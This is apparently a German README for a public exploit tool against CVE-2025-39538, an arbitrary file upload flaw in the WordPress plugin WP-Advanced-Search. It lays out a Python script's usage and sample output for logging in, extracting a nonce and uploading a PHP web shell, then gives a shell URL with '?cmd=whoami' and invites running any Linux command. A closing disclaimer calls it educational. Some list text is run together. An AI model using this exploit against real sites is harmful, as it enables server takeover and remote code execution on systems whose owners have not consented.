
WordPress WP-Advanced-Search <= 3.3.9.3 - Schwachstelle beim Hochladen beliebiger Dateien
CVE-2025-39538
Veröffentlicht: 2025-04-16
Schwachstellentyp: Beliebiger Datei-Upload (Uneingeschränkter Upload von Dateien mit gefährlichem Typ)
Betroffenes Plugin: WP-Advanced-Search von Mathieu Chartier
Betroffene Versionen: Alle Versionen bis einschließlich 3.3.9.3
Diese Schwachstelle ermöglicht es einem authentifizierten Angreifer, mithilfe der vom Plugin bereitgestellten Importfunktion eine schädliche PHP-Datei (z. B. eine Web-Shell) auf den Server hochzuladen. Die hochgeladene Datei wird im WordPress-Uploads-Verzeichnis abgelegt und kann zu Remote-Code-Ausführung führen.
🧱 Upload-Pfad:
wp-content/uploads/2025/04/
Dieses Python-Skript führt folgende Aktionen aus:
wp_advanced_search_up_nonce aus der Import/Export-Administrationsseite.usage: a.py [-h] -u URL -un USERNAME -p PASSWORD
CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g., http://127.0.0.1/wordpress)
-un, --username USERNAME
WordPress Username
-p, --password PASSWORD
WordPress Password
[*] Attempting login...
[+] Logged in successfully.
[*] Fetching nonce from import/export page...
[+] Nonce extracted: 2140855687
[*] Attempting to upload shell...
[+] File uploaded (check wp-content/uploads or temp directory).
Nach dem Upload kannst du wie folgt auf deine Shell zugreifen:
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami
Ersetze whoami durch einen beliebigen Linux-Befehl, den du ausführen möchtest, zum Beispiel:
id — zeigt die aktuelle Benutzer-ID an.pwd — zeigt das aktuelle Verzeichnis an.ls — listet Dateien auf.Dieses Tool ist ausschließlich für Lehrzwecke und autorisierte Sicherheitstests gedacht.
Der Autor ist für jeglichen Missbrauch oder Schäden, die durch dieses Skript verursacht werden, nicht verantwortlich.
Von: Nxploited | Khaled Alenazi